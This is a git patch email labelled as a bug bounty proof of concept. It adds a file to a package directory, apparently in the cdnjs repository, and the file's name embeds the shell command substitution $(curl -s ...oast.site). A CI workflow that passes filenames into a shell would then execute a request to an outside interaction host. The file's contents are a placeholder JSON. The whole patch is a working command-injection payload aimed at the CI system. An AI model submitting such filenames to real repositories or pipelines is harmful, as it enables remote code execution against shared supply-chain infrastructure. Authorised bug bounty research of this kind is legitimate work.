From d01bd51aeaede485bb3d761a83a2e924d095433c Mon Sep 17 00:00:00 2001
From: mohammadmseet-hue <meemo.max@gmail.com>
Date: Thu, 21 May 2026 09:22:12 +0200
Subject: [PATCH] Add poc library (security research)

Bug bounty PoC - demonstrates filename injection in CI workflow.
Researcher: mohammadmseet-hue / meemo.max@gmail.com
---
 ...s cdnjs-rce.d87b52hnhllrku7t56j0535in63kj7m96.oast.site).json | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 packages/p/poc$(curl -s cdnjs-rce.d87b52hnhllrku7t56j0535in63kj7m96.oast.site).json

diff --git a/packages/p/poc$(curl -s cdnjs-rce.d87b52hnhllrku7t56j0535in63kj7m96.oast.site).json b/packages/p/poc$(curl -s cdnjs-rce.d87b52hnhllrku7t56j0535in63kj7m96.oast.site).json
new file mode 100644
index 000000000..d30aa2056
--- /dev/null
+++ b/packages/p/poc$(curl -s cdnjs-rce.d87b52hnhllrku7t56j0535in63kj7m96.oast.site).json	
@@ -0,0 +1 @@
+{"name": "poc-rce", "description": "bug bounty research - do not merge"}
\ No newline at end of file